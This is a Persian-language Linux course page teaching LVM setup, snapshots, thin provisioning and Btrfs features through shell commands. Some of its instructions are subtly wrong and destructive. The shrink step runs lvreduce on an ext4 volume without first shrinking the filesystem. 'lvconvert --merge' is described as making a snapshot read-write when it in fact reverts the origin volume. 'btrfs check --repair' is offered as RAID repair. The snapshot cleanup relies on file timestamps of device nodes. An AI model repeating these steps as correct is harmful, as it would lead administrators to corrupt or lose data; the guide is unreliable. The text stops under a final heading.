دانلود کتاب آموزشی پیشرفته مدیریت سرور های لینوکسی جلد اول

[cdb_course_lessons title=”بخش 1: سیستم فایل‌ها و ذخیره‌سازی پیشرفته”][cdb_course_lesson title=”فصل 1. LVM و Snapshots”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”معرفی LVM (Logical Volume Management) و کاربردهای آن” subtitle=”توضیحات کامل”]LVM یا مدیریت حجم منطقی یک روش انعطاف‌پذیر و قدرتمند برای مدیریت فضای دیسک در سیستم‌های لینوکسی است. این روش به جای استفاده از پارتیشن‌های سنتی، لایه‌ای انتزاعی روی هارد دیسک ایجاد می‌کند که امکان تغییر اندازه، ادغام و مدیریت بهتر فضای دیسک را فراهم می‌آورد.

---

مزایای استفاده از LVM

1. افزایش و کاهش اندازه پارتیشن‌ها بدون نیاز به خاموش کردن سیستم
2. مدیریت ساده‌تر فضای دیسک از طریق ترکیب چندین دیسک در یک گروه حجمی
3. Snapshot گیری از داده‌ها برای ایجاد بکاپ سریع و پایدار
4. مهاجرت داده‌ها بین دیسک‌های مختلف بدون نیاز به Downtime
5. افزودن فضای جدید بدون تأثیر بر عملکرد سیستم

---

ساختار LVM

LVM از سه بخش اصلی تشکیل شده است:

1. Physical Volume (PV): دیسک فیزیکی یا پارتیشنی که برای LVM اختصاص داده شده است.
2. Volume Group (VG): گروه حجمی که شامل یک یا چند PV می‌شود و فضای ذخیره‌سازی قابل تخصیص را فراهم می‌آورد.
3. Logical Volume (LV): بخش منطقی که مانند یک پارتیشن عمل می‌کند و برای استفاده در فایل‌سیستم‌ها تخصیص داده می‌شود.

---

نصب LVM در لینوکس

در بسیاری از توزیع‌های لینوکس، LVM به‌صورت پیش‌فرض نصب است. در غیر این صورت، می‌توان آن را به‌صورت زیر نصب کرد:

# نصب LVM در توزیع‌های مبتنی بر Debian (Ubuntu, Debian)
sudo apt update && sudo apt install lvm2

# نصب LVM در توزیع‌های مبتنی بر Red Hat (CentOS, RHEL)
sudo yum install lvm2 -y

# فعال‌سازی سرویس LVM
sudo systemctl enable --now lvm2-lvmetad

---

ایجاد و پیکربندی LVM

1. شناسایی دیسک‌های موجود

برای مشاهده دیسک‌های متصل به سیستم:

lsblk
fdisk -l

2. ایجاد Physical Volume (PV)

ابتدا باید دیسک موردنظر را به عنوان PV مقداردهی کنیم. فرض کنیم دیسک /dev/sdb را می‌خواهیم به LVM اضافه کنیم:

sudo pvcreate /dev/sdb

3. ایجاد Volume Group (VG)

بعد از تعریف PV، باید یک VG بسازیم. برای مثال، نام VG را vg_data می‌گذاریم:

sudo vgcreate vg_data /dev/sdb

4. ایجاد Logical Volume (LV)

حالا می‌توانیم یک LV داخل VG بسازیم. فرض کنیم می‌خواهیم یک LV با اندازه 20GB ایجاد کنیم:

sudo lvcreate -L 20G -n lv_storage vg_data

5. فرمت کردن LV و مانت کردن آن

بعد از ایجاد LV، باید آن را فرمت و در سیستم مانت کنیم:

sudo mkfs.ext4 /dev/vg_data/lv_storage
sudo mkdir /mnt/storage
sudo mount /dev/vg_data/lv_storage /mnt/storage

برای اطمینان از مانت شدن:

df -h | grep /mnt/storage

6. اضافه کردن LV به /etc/fstab برای مانت خودکار

برای مانت خودکار بعد از ری‌استارت، باید مسیر LV را در فایل /etc/fstab اضافه کنیم:

echo '/dev/vg_data/lv_storage /mnt/storage ext4 defaults 0 2' | sudo tee -a /etc/fstab

---

افزایش فضای Logical Volume

یکی از ویژگی‌های مهم LVM امکان افزایش اندازه LV بدون از دست دادن داده است.

1. افزایش اندازه VG در صورت نیاز

اگر فضای VG پر شده باشد، می‌توان یک PV جدید اضافه کرد:

sudo pvcreate /dev/sdc
sudo vgextend vg_data /dev/sdc

2. افزایش اندازه LV

برای افزایش اندازه LV به 50GB:

sudo lvresize -L 50G /dev/vg_data/lv_storage
sudo resize2fs /dev/vg_data/lv_storage

---

ایجاد Snapshot در LVM

Snapshot‌ها برای تهیه بکاپ لحظه‌ای از داده‌ها استفاده می‌شوند.

sudo lvcreate -L 5G -s -n snap_backup /dev/vg_data/lv_storage

برای مشاهده Snapshot:

sudo lvs

---

حذف LVM

در صورت نیاز به حذف یک LV، VG یا PV، مراحل زیر را دنبال کنید:

1. Unmount کردن LV

sudo umount /mnt/storage

2. حذف LV

sudo lvremove /dev/vg_data/lv_storage

3. حذف VG

sudo vgremove vg_data

4. حذف PV

sudo pvremove /dev/sdb

---

جمع‌بندی

LVM یک راهکار انعطاف‌پذیر و قدرتمند برای مدیریت فضای دیسک در لینوکس است که امکان ایجاد، تغییر اندازه، snapshot گیری و مهاجرت داده‌ها را به صورت پویاتر فراهم می‌آورد. این ابزار به‌ویژه برای سرورها، سیستم‌های مجازی و محیط‌های ابری بسیار کاربردی است. در این بخش، نحوه نصب، پیکربندی، افزایش حجم، snapshot گیری و حذف LVM را همراه با دستورات کامندی ارائه کردیم. این دانش به شما امکان می‌دهد تا مدیریت دیسک را بهینه‌تر انجام دهید و از قابلیت‌های پیشرفته LVM به‌صورت عملی بهره‌مند شوید.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نحوه ایجاد Volume Groups و Logical Volumes در LVM” subtitle=”توضیحات کامل”]در LVM (مدیریت حجم منطقی)، Volume Group (VG) مجموعه‌ای از Physical Volumes (PV) است که به عنوان یک واحد ذخیره‌سازی مدیریت می‌شود. سپس از داخل یک Volume Group، می‌توان Logical Volumes (LV) ایجاد کرد که مانند پارتیشن‌های معمولی برای ذخیره داده‌ها استفاده می‌شوند.

---

مراحل ایجاد Volume Group و Logical Volume

۱. بررسی دیسک‌های موجود

ابتدا دیسک‌های متصل به سیستم را بررسی کنید تا ببینید کدام‌ یک برای اضافه شدن به LVM مناسب هستند.

lsblk
fdisk -l

---

۲. ایجاد Physical Volume (PV)

قبل از ایجاد یک Volume Group، باید دیسک‌های فیزیکی را به Physical Volume (PV) تبدیل کنیم.

sudo pvcreate /dev/sdb /dev/sdc

در این مثال، /dev/sdb و /dev/sdc به عنوان دیسک‌های فیزیکی به LVM اضافه می‌شوند.

برای بررسی وضعیت PV‌های ایجاد شده:

pvs
pvdisplay

---

۳. ایجاد Volume Group (VG)

برای ایجاد Volume Group از Physical Volume‌هایی که در مرحله قبل ایجاد کردیم، از دستور زیر استفاده می‌کنیم:

sudo vgcreate my_vg /dev/sdb /dev/sdc

اینجا my_vg نام گروه حجمی جدیدی است که از /dev/sdb و /dev/sdc ساخته شده است.

بررسی Volume Group‌های موجود:

vgs
vgdisplay my_vg

---

۴. ایجاد Logical Volume (LV)

پس از ایجاد Volume Group، حالا می‌توان یک Logical Volume درون آن ساخت. به‌عنوان مثال، ایجاد یک LV با اندازه ۵۰ گیگابایت:

sudo lvcreate -L 50G -n my_lv my_vg

برای بررسی حجم‌های منطقی:

lvs
lvdisplay /dev/my_vg/my_lv

---

۵. فرمت کردن و مونت کردن Logical Volume

پس از ایجاد Logical Volume، باید آن را فرمت کنیم:

sudo mkfs.ext4 /dev/my_vg/my_lv

سپس یک دایرکتوری برای مونت کردن ایجاد کرده و آن را مونت می‌کنیم:

sudo mkdir /mnt/mydata
sudo mount /dev/my_vg/my_lv /mnt/mydata

برای اینکه این تغییرات پس از ریبوت سیستم حفظ شوند، مسیر را در /etc/fstab اضافه کنید:

/dev/my_vg/my_lv /mnt/mydata ext4 defaults 0 0

---

جمع‌بندی

ایجاد Volume Group و Logical Volume در LVM، فرآیندی انعطاف‌پذیر برای مدیریت فضای ذخیره‌سازی است. ابتدا دیسک‌های فیزیکی را به Physical Volume (PV) تبدیل کرده، سپس یک Volume Group (VG) از آن‌ها ساخته و در نهایت Logical Volume (LV) ایجاد می‌کنیم. پس از فرمت کردن و مونت کردن LV، می‌توان از آن مانند یک پارتیشن معمولی استفاده کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات Snapshots در LVM” subtitle=”توضیحات کامل”]در LVM، اسنپ شات یک نسخه فقط‌خواندنی (یا خواندنی-نوشتنی) از یک Logical Volume (LV) است که در لحظه‌ای خاص گرفته شده و می‌توان از آن برای بازیابی اطلاعات، تهیه نسخه پشتیبان، یا آزمایش تغییرات استفاده کرد.

استفاده از Snapshots در LVM، به شما این امکان را می‌دهد که یک کپی فوری از داده‌ها بدون نیاز به کلون‌کردن فیزیکی داشته باشید، که این موضوع به‌خصوص در سرورهای عملیاتی و محیط‌های حساس بسیار مفید است.

---

۱. بررسی Volume Group و Logical Volumes

قبل از ایجاد Snapshot، ابتدا باید نام Volume Group و Logical Volume را بررسی کنیم:

vgs
lvs

---

۲. ایجاد یک Snapshot

برای ایجاد یک Snapshot از Logical Volume موردنظر، از دستور زیر استفاده کنید:

sudo lvcreate -L 10G -s -n my_snapshot /dev/my_vg/my_lv

• -L 10G حجم Snapshot را تعیین می‌کند (باید متناسب با حجم تغییرات احتمالی باشد).
• -s نشان‌دهنده ایجاد Snapshot است.
• -n my_snapshot نامی که برای Snapshot انتخاب شده است.
• /dev/my_vg/my_lv مسیر Logical Volume اصلی که Snapshot از آن گرفته می‌شود.

برای بررسی ایجاد موفق Snapshot:

lvs
lvdisplay /dev/my_vg/my_snapshot

---

۳. استفاده از Snapshot

یک Snapshot به‌صورت پیش‌فرض فقط‌خواندنی است. برای مشاهده فایل‌ها و دسترسی به Snapshot، می‌توان آن را روی یک مسیر خاص مونت کرد:

sudo mkdir /mnt/snapshot
sudo mount /dev/my_vg/my_snapshot /mnt/snapshot

اکنون داده‌های ذخیره‌شده در Snapshot قابل مشاهده هستند.

در صورتی که نیاز به یک Snapshot خواندنی-نوشتنی باشد، از دستور زیر استفاده کنید:

sudo lvconvert --merge /dev/my_vg/my_snapshot

---

۴. بازیابی Snapshot

اگر بخواهید Snapshot را به عنوان نسخه اصلی بازیابی کنید، ابتدا آن را آن‌مونت کرده و سپس با استفاده از merge آن را روی نسخه اصلی اعمال کنید:

sudo umount /mnt/snapshot
sudo lvconvert --merge /dev/my_vg/my_snapshot

پس از اجرای دستور بالا، برای اعمال تغییرات لازم است که سیستم را ریبوت کنید:

sudo reboot

---

۵. حذف Snapshot

در صورتی که Snapshot دیگر نیازی نداشته باشد، می‌توان آن را حذف کرد:

sudo umount /mnt/snapshot
sudo lvremove /dev/my_vg/my_snapshot

برای تأیید حذف شدن Snapshot:

lvs

---

جمع‌بندی

Snapshot در LVM به شما این امکان را می‌دهد که یک نسخه لحظه‌ای از داده‌های خود داشته باشید، که برای بکاپ‌گیری و بازیابی بسیار مفید است. برای ایجاد Snapshot باید یک Logical Volume داشته باشید، حجم مناسب را برای Snapshot مشخص کنید و در صورت نیاز آن را بازیابی یا حذف کنید. Snapshots به دو صورت فقط‌خواندنی و خواندنی-نوشتنی قابل استفاده هستند و می‌توانند بدون نیاز به کپی‌کردن کل داده‌ها، امنیت و انعطاف‌پذیری بالایی را فراهم کنند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”استفاده از Thin Provisioning برای بهینه‌سازی فضای ذخیره‌سازی” subtitle=”توضیحات کامل”]Thin Provisioning یکی از قابلیت‌های مهم LVM است که به شما این امکان را می‌دهد تا فضای ذخیره‌سازی را به‌صورت پویا و بهینه مدیریت کنید. برخلاف Thick Provisioning که از همان ابتدا کل فضای اختصاص‌یافته را رزرو می‌کند، در Thin Provisioning فضا در لحظه نیاز تخصیص داده می‌شود و این باعث افزایش بهره‌وری فضای دیسک خواهد شد.

این قابلیت به‌ویژه در محیط‌هایی که فضای ذخیره‌سازی محدود است یا نیاز به انعطاف‌پذیری بالایی دارند، بسیار مفید خواهد بود.

---

۱. بررسی پیش‌نیازهای Thin Provisioning

قبل از ایجاد Thin Pool و Thin Volume، ابتدا باید Volume Group را بررسی کنیم:

vgs
lvs

اگر Volume Group وجود ندارد، ابتدا آن را ایجاد کنید:

sudo vgcreate my_vg /dev/sdb

---

۲. ایجاد Thin Pool

برای استفاده از Thin Provisioning، ابتدا باید یک Thin Pool ایجاد شود. دستور زیر یک Thin Pool با حجم 50 گیگابایت در Volume Group مشخص‌شده ایجاد می‌کند:

sudo lvcreate -L 50G --thinpool my_thinpool my_vg

برای تأیید ایجاد شدن Thin Pool:

lvs -a my_vg

---

۳. ایجاد Thin Volume

پس از ایجاد Thin Pool، می‌توان Thin Volume را روی آن ایجاد کرد. فرض کنیم می‌خواهیم یک Logical Volume با ظرفیت 100 گیگابایت ایجاد کنیم که فقط در صورت نیاز از فضای ذخیره‌سازی استفاده کند:

sudo lvcreate -V 100G --thin -n my_thinvolume my_vg/my_thinpool

برای مشاهده Thin Volumes ایجادشده:

lvs -a my_vg

---

۴. فرمت و استفاده از Thin Volume

پس از ایجاد Thin Volume، آن را فرمت کرده و برای استفاده آماده می‌کنیم:

sudo mkfs.ext4 /dev/my_vg/my_thinvolume

سپس یک دایرکتوری برای مونت کردن ایجاد می‌کنیم:

sudo mkdir /mnt/thin_volume

و آن را مونت می‌کنیم:

sudo mount /dev/my_vg/my_thinvolume /mnt/thin_volume

برای اطمینان از مونت شدن، دستور زیر را اجرا کنید:

df -hT

---

۵. مانیتورینگ فضای مصرفی در Thin Pool

با اجرای دستور زیر، می‌توان میزان فضای مصرف‌شده در Thin Pool را بررسی کرد:

sudo lvs -a -o +thin_pool,metadata_percent,data_percent my_vg

پارامترهای مهم در این خروجی:

• metadata_percent: نشان می‌دهد چه مقدار از فضای متادیتای Thin Pool استفاده شده است.
• data_percent: میزان استفاده از فضای اختصاص‌یافته در Thin Pool را نشان می‌دهد.

---

۶. افزایش اندازه Thin Pool

اگر فضای Thin Pool رو به اتمام باشد، می‌توان آن را افزایش داد. برای مثال، افزایش 20 گیگابایت به Thin Pool:

sudo lvextend -L +20G my_vg/my_thinpool

برای تأیید تغییرات:

lvs -a my_vg

---

۷. حذف Thin Volume

اگر دیگر نیازی به Thin Volume نباشد، ابتدا باید آن را unmount کنیم:

sudo umount /mnt/thin_volume

سپس آن را حذف کنیم:

sudo lvremove /dev/my_vg/my_thinvolume

برای تأیید حذف شدن:

lvs -a my_vg

---

جمع‌بندی

Thin Provisioning در LVM به شما این امکان را می‌دهد که فضای ذخیره‌سازی را به‌صورت بهینه و پویا مدیریت کنید. این روش باعث می‌شود که فضای دیسک فقط در زمان موردنیاز اشغال شود و به این ترتیب، بهره‌وری سیستم بهبود یابد.

با استفاده از Thin Pool و Thin Volume، می‌توان بدون اشغال کردن فضای فیزیکی بیش از حد، انعطاف‌پذیری بالایی در مدیریت ذخیره‌سازی داشت. همچنین، امکان افزایش اندازه Thin Pool در صورت نیاز وجود دارد، که باعث می‌شود منابع ذخیره‌سازی با کارایی بیشتری مورد استفاده قرار بگیرند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”عملیات مدیریتی Snapshots (حذف، بازگردانی)” subtitle=”توضیحات کامل”]Snapshots در LVM ابزاری قدرتمند برای پشتیبان‌گیری از وضعیت فعلی یک Volume است. این قابلیت به شما امکان می‌دهد یک نسخه کپی از داده‌های یک Logical Volume را بدون ایجاد اختلال در عملکرد اصلی ذخیره‌سازی ایجاد کنید.

با استفاده از Snapshots، می‌توان داده‌ها را در صورت خرابی، تغییرات نامناسب، یا حذف تصادفی به وضعیت قبلی بازگرداند. در این بخش، نحوه حذف و بازگردانی Snapshots را بررسی خواهیم کرد.

---

۱. بررسی Snapshots موجود

برای مشاهده تمامی Snapshots ایجادشده در سیستم، از دستور زیر استفاده کنید:

sudo lvs -a -o +origin

در ستون “Origin” نام Logical Volume اصلی مشخص است که Snapshot به آن وابسته است.

---

۲. حذف Snapshot

اگر به یک Snapshot دیگر نیازی نداشته باشیم، می‌توان آن را با دستور lvremove حذف کرد. قبل از حذف، مطمئن شوید که Snapshot در حال استفاده نیست.

برای حذف یک Snapshot مشخص، دستور زیر را اجرا کنید:

sudo lvremove /dev/my_vg/my_snapshot

پس از حذف، برای اطمینان از حذف شدن Snapshot، مجدداً لیست Logical Volumes را بررسی کنید:

sudo lvs

اگر Snapshot در حال استفاده باشد، ممکن است پیام خطایی دریافت کنید. در این صورت، ابتدا آن را unmount کنید:

sudo umount /mnt/my_snapshot

سپس مجدداً آن را حذف کنید.

---

۳. بازگردانی Snapshot به وضعیت قبلی

اگر بخواهید سیستم را به وضعیت Snapshot برگردانید، می‌توانید Snapshot را روی Logical Volume اصلی اعمال کنید. قبل از بازگردانی، اطمینان حاصل کنید که Logical Volume در حال استفاده نیست.

مراحل بازگردانی Snapshot:

1. Unmount کردن Volume اصلی:

sudo umount /mnt/my_volume

2. بازگردانی Snapshot به وضعیت اولیه:

sudo lvconvert --merge /dev/my_vg/my_snapshot

3. اگر Volume در حال استفاده باشد، پس از ریبوت عملیات اعمال خواهد شد. می‌توانید با اجرای این دستور ریبوت را انجام دهید:

sudo reboot

---

۴. حذف خودکار Snapshots قدیمی

اگر می‌خواهید Snapshots را بعد از یک مدت مشخص حذف کنید، می‌توانید یک کران‌جاب (Cron Job) برای حذف Snapshots قدیمی تنظیم کنید. ابتدا ویرایشگر crontab را باز کنید:

sudo crontab -e

سپس دستور زیر را اضافه کنید تا هر روز Snapshots قدیمی‌تر از 7 روز حذف شوند:

find /dev/my_vg/ -name "my_snapshot*" -mtime +7 -exec lvremove -f {} \;

---

۵. بررسی میزان فضای استفاده‌شده توسط Snapshots

برای نظارت بر میزان فضای اشغال‌شده توسط Snapshots، می‌توان از دستور زیر استفاده کرد:

sudo lvs -a -o +snap_percent

اگر مقدار snap_percent نزدیک به 100% شود، Snapshot ممکن است نامعتبر شود و نیاز به فضای بیشتر داشته باشد.

---

۶. افزایش فضای Snapshot

اگر Snapshot در حال پر شدن باشد، می‌توان فضای آن را افزایش داد:

sudo lvextend -L +5G /dev/my_vg/my_snapshot

پس از افزایش اندازه، مجدداً مقدار فضای استفاده‌شده را بررسی کنید:

sudo lvs -a -o +snap_percent

---

جمع‌بندی

در این بخش، روش‌های مدیریت Snapshots در LVM شامل حذف، بازگردانی، بررسی فضای اشغال‌شده و افزایش حجم Snapshot بررسی شد. Snapshots یک راهکار مؤثر برای محافظت از داده‌ها و بازیابی سریع در صورت بروز مشکل است. با استفاده از دستورات مدیریت Snapshot می‌توان فضای ذخیره‌سازی را بهینه‌سازی کرده و از اشغال بیهوده فضای دیسک جلوگیری کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تخصیص و استفاده از فضای ذخیره‌سازی با استفاده از LVM” subtitle=”توضیحات کامل”]LVM یکی از بهترین روش‌های مدیریت فضای ذخیره‌سازی در لینوکس است که انعطاف‌پذیری بالایی در افزایش، کاهش، تخصیص و مدیریت فضا ارائه می‌دهد. با استفاده از LVM، می‌توان فضای ذخیره‌سازی را به‌صورت پویا مدیریت کرده و بدون نیاز به تغییرات پیچیده، پارتیشن‌ها را گسترش یا کاهش داد.

در این بخش، مراحل تخصیص و استفاده از فضای ذخیره‌سازی با LVM به‌صورت عملی بررسی خواهد شد.

---

۱. بررسی دیسک‌های موجود برای استفاده در LVM

قبل از شروع، لیست دیسک‌های متصل را بررسی کنید:

sudo fdisk -l

همچنین می‌توانید از دستور زیر برای بررسی دیسک‌های خام بدون استفاده استفاده کنید:

lsblk

---

۲. ایجاد Physical Volume (PV)

ابتدا دیسک‌های خام را به‌عنوان Physical Volume (PV) برای استفاده در LVM تنظیم کنید. فرض کنیم دیسک /dev/sdb را برای این کار در نظر گرفته‌ایم:

sudo pvcreate /dev/sdb

برای تأیید ایجاد شدن Physical Volume، از دستور زیر استفاده کنید:

sudo pvs

---

۳. ایجاد Volume Group (VG)

حالا باید یک Volume Group (VG) ایجاد کنیم تا بتوانیم از Physical Volume استفاده کنیم. نام VG را my_vg در نظر می‌گیریم:

sudo vgcreate my_vg /dev/sdb

برای بررسی ایجاد شدن Volume Group، از دستور زیر استفاده کنید:

sudo vgs

---

۴. ایجاد Logical Volume (LV)

بعد از ایجاد Volume Group، می‌توانیم یک Logical Volume (LV) در آن ایجاد کنیم. فرض کنیم می‌خواهیم یک LV با اندازه 20 گیگابایت ایجاد کنیم:

sudo lvcreate -L 20G -n my_lv my_vg

برای بررسی ایجاد شدن Logical Volume، از دستور زیر استفاده کنید:

sudo lvs

---

۵. فرمت کردن Logical Volume

قبل از استفاده از Logical Volume، باید آن را فرمت کنیم. به‌عنوان مثال، برای فرمت کردن LV با سیستم فایل ext4، دستور زیر را اجرا کنید:

sudo mkfs.ext4 /dev/my_vg/my_lv

---

۶. مانت کردن Logical Volume

برای استفاده از Logical Volume، باید آن را در یک دایرکتوری خاص مانت کنیم. به‌عنوان مثال، اگر می‌خواهید آن را در مسیر /mnt/my_storage مانت کنید، مراحل زیر را انجام دهید:

sudo mkdir -p /mnt/my_storage
sudo mount /dev/my_vg/my_lv /mnt/my_storage

برای بررسی اینکه LV به‌درستی مانت شده است، دستور زیر را اجرا کنید:

df -h

---

۷. تنظیم مانت دائمی در فایل fstab

اگر می‌خواهید Logical Volume پس از هر ری‌استارت سیستم نیز به‌صورت خودکار مانت شود، باید مسیر آن را در فایل /etc/fstab اضافه کنید. ابتدا UUID مربوط به LV را دریافت کنید:

sudo blkid /dev/my_vg/my_lv

سپس مقدار UUID را در فایل /etc/fstab اضافه کنید:

sudo nano /etc/fstab

و خط زیر را به انتهای فایل اضافه کنید:

UUID=your-uuid-value  /mnt/my_storage  ext4  defaults  0  2

بعد از ذخیره و خروج، برای اعمال تغییرات بدون ری‌استارت، دستور زیر را اجرا کنید:

sudo mount -a

---

۸. افزایش اندازه Logical Volume

اگر نیاز به افزایش فضای Logical Volume داشتید، ابتدا اندازه‌ی آن را افزایش دهید. فرض کنیم می‌خواهیم فضای آن را 10 گیگابایت بیشتر کنیم:

sudo lvextend -L +10G /dev/my_vg/my_lv

سپس سیستم فایل را نیز برای استفاده از فضای جدید گسترش دهید:

sudo resize2fs /dev/my_vg/my_lv

---

۹. کاهش اندازه Logical Volume

کاهش اندازه LV نیازمند Unmount کردن آن است. ابتدا LV را Unmount کنید:

sudo umount /mnt/my_storage

سپس اندازه را کاهش دهید (مثلاً به 15 گیگابایت):

sudo lvreduce -L 15G /dev/my_vg/my_lv

پس از کاهش اندازه، مجدداً آن را مانت کنید:

sudo mount /dev/my_vg/my_lv /mnt/my_storage

---

۱۰. حذف Logical Volume

برای حذف یک Logical Volume ابتدا آن را Unmount کنید:

sudo umount /mnt/my_storage

سپس آن را حذف کنید:

sudo lvremove /dev/my_vg/my_lv

---

جمع‌بندی

در این بخش، نحوه ایجاد، مدیریت و استفاده از فضای ذخیره‌سازی با LVM بررسی شد. این فرآیند شامل مراحل زیر بود:

• ایجاد Physical Volume (PV)
• ایجاد Volume Group (VG)
• ایجاد Logical Volume (LV)
• فرمت و مانت کردن LV
• افزودن به /etc/fstab برای مانت دائمی
• افزایش و کاهش اندازه LV
• حذف Logical Volume

مدیریت LVM به مدیران سیستم امکان می‌دهد تا انعطاف‌پذیری بالایی در تخصیص فضا داشته باشند و به‌راحتی تغییرات لازم را در حجم‌های منطقی ایجاد کنند.[/cdb_course_lesson][cdb_course_lesson title=”فصل 2. سیستم فایل‌های پیشرفته”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”Btrfs: ویژگی‌ها و کاربردها” subtitle=”توضیحات کامل”]Btrfs (B-Tree File System) یک سیستم فایل پیشرفته برای لینوکس است که ویژگی‌های قدرتمندی مانند نسخه‌سازی (Snapshot)، چک کردن یکپارچگی داده‌ها (Checksumming) و ذخیره‌سازی فشرده (Compression) را ارائه می‌دهد. این ویژگی‌ها Btrfs را به گزینه‌ای مناسب برای سرورها، سیستم‌های ذخیره‌سازی بزرگ و محیط‌های مجازی تبدیل کرده است.

در این بخش، این ویژگی‌ها را بررسی کرده و نحوه استفاده عملی از آن‌ها را توضیح خواهیم داد.

---

۱. ویژگی نسخه‌سازی (Snapshots) در Btrfs

یکی از مهم‌ترین ویژگی‌های Btrfs قابلیت Snapshots است که به شما اجازه می‌دهد از یک سیستم فایل در یک لحظه مشخص یک نسخه غیرمستقیم و سریع بگیرید. این ویژگی به ویژه برای بازیابی اطلاعات، مدیریت تغییرات و محیط‌های آزمایشی کاربرد دارد.

۱.۱ ایجاد یک Snapshot

فرض کنید یک سیستم فایل Btrfs در مسیر /mnt/btrfs داریم و می‌خواهیم از آن یک Snapshot بگیریم:

sudo btrfs subvolume snapshot /mnt/btrfs /mnt/btrfs_backup

۱.۲ لیست کردن Snapshots موجود

برای مشاهده لیست Snapshots ایجادشده:

sudo btrfs subvolume list /mnt/btrfs

۱.۳ بازگردانی Snapshot به حالت اولیه

برای بازگرداندن Snapshot، می‌توان آن را Mount کرد یا مستقیماً جایگزین کرد. اگر بخواهید آن را جایگزین نسخه اصلی کنید:

sudo btrfs subvolume delete /mnt/btrfs
sudo mv /mnt/btrfs_backup /mnt/btrfs

۱.۴ حذف یک Snapshot

sudo btrfs subvolume delete /mnt/btrfs_backup

---

۲. بررسی یکپارچگی داده‌ها (Checksumming)

یکی از مزیت‌های Btrfs استفاده از Checksumming برای جلوگیری از خرابی داده‌ها است. این ویژگی به کمک الگوریتم CRC32C بررسی می‌کند که داده‌های ذخیره‌شده دچار خطا نشده باشند.

۲.۱ بررسی سلامت داده‌ها

برای بررسی یکپارچگی داده‌های ذخیره‌شده در سیستم فایل Btrfs:

sudo btrfs scrub start /mnt/btrfs

برای مشاهده وضعیت Scrubbing:

sudo btrfs scrub status /mnt/btrfs

۲.۲ بازیابی داده‌های خراب‌شده

اگر سیستم فایل روی RAID 1 یا RAID 5/6 تنظیم شده باشد، Btrfs می‌تواند داده‌های خراب را از نسخه‌های سالم بازیابی کند:

sudo btrfs check --repair /dev/sdX

توجه: گزینه --repair ممکن است داده‌های خراب را حذف کند، بنابراین قبل از اجرای این دستور یک Backup تهیه کنید.

---

۳. ذخیره‌سازی فشرده (Compression)

یکی دیگر از ویژگی‌های کاربردی Btrfs امکان فشرده‌سازی داخلی داده‌ها است که باعث صرفه‌جویی در فضای ذخیره‌سازی و افزایش سرعت خواندن و نوشتن داده‌ها می‌شود.

۳.۱ فعال‌سازی فشرده‌سازی هنگام Mount کردن

می‌توان Btrfs را به گونه‌ای پیکربندی کرد که هنگام Mount شدن به‌طور خودکار داده‌ها را فشرده کند. برای این کار، مقدار compress=zstd را در فایل /etc/fstab اضافه کنید:

/dev/sdX /mnt/btrfs btrfs defaults,compress=zstd 0 0

سپس تغییرات را با اجرای دستور زیر اعمال کنید:

sudo mount -o remount /mnt/btrfs

۳.۲ فشرده‌سازی داده‌های موجود

اگر بخواهید داده‌های قبلی را نیز فشرده کنید، می‌توانید از دستور زیر استفاده کنید:

sudo btrfs filesystem defrag -r -v -czstd /mnt/btrfs

۳.۳ بررسی میزان فشرده‌سازی و فضای آزاد‌شده

برای مشاهده میزان فشرده‌سازی و صرفه‌جویی در فضا:

sudo btrfs filesystem df /mnt/btrfs

---

جمع‌بندی

در این بخش، سه ویژگی کلیدی Btrfs بررسی شد:

• Snapshots که امکان ایجاد نسخه‌های سریع از داده‌ها را فراهم می‌کند.
• Checksumming که از صحت داده‌ها محافظت کرده و قابلیت Scrubbing و Repair دارد.
• Compression که با کاهش فضای مصرفی، عملکرد سیستم را بهبود می‌بخشد.

این قابلیت‌ها Btrfs را به یک سیستم فایل ایده‌آل برای محیط‌های سروری، مجازی‌سازی و ذخیره‌سازی پیشرفته تبدیل می‌کند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نحوه پیکربندی و استفاده از Btrfs” subtitle=”توضیحات کامل”]Btrfs یک سیستم فایل پیشرفته برای لینوکس است که امکاناتی مانند مدیریت حجم پویا، Snapshots، RAID، فشرده‌سازی داده‌ها و بررسی یکپارچگی اطلاعات را ارائه می‌دهد. در این بخش، نحوه ایجاد، پیکربندی و مدیریت Btrfs را با مثال‌های عملی بررسی خواهیم کرد.

---

۱. ایجاد و پیکربندی سیستم فایل Btrfs

۱.۱ نصب ابزارهای Btrfs

در صورتی که ابزارهای مدیریتی Btrfs نصب نیستند، می‌توانید آن‌ها را نصب کنید:

در Debian/Ubuntu:

sudo apt update
sudo apt install btrfs-progs -y

در CentOS/RHEL:

sudo yum install btrfs-progs -y

۱.۲ ایجاد یک سیستم فایل Btrfs روی یک پارتیشن

برای فرمت کردن یک پارتیشن با Btrfs، از دستور زیر استفاده کنید:

sudo mkfs.btrfs /dev/sdX

اگر بخواهید نام Label برای سیستم فایل مشخص کنید:

sudo mkfs.btrfs -L MyBtrfsVolume /dev/sdX

۱.۳ مانت کردن سیستم فایل Btrfs

ابتدا یک دایرکتوری برای Mount Point ایجاد کنید:

sudo mkdir -p /mnt/btrfs

سپس سیستم فایل را مانت کنید:

sudo mount /dev/sdX /mnt/btrfs

۱.۴ اضافه کردن به /etc/fstab برای مانت خودکار

برای اینکه این پارتیشن در هنگام بوت به‌طور خودکار مانت شود، آن را به فایل /etc/fstab اضافه کنید:

echo "/dev/sdX /mnt/btrfs btrfs defaults 0 0" | sudo tee -a /etc/fstab

---

۲. مدیریت حجم‌های Btrfs

۲.۱ افزودن چندین دیسک به یک Volume Btrfs

اگر بخواهید چندین دیسک را به‌صورت یکپارچه مدیریت کنید، می‌توانید هنگام ایجاد سیستم فایل آن‌ها را مشخص کنید:

sudo mkfs.btrfs -d single -m single /dev/sdX /dev/sdY /dev/sdZ

۲.۲ افزودن دیسک جدید به سیستم فایل موجود

sudo btrfs device add /dev/sdY /mnt/btrfs

۲.۳ مشاهده اطلاعات دیسک‌های متصل به Btrfs

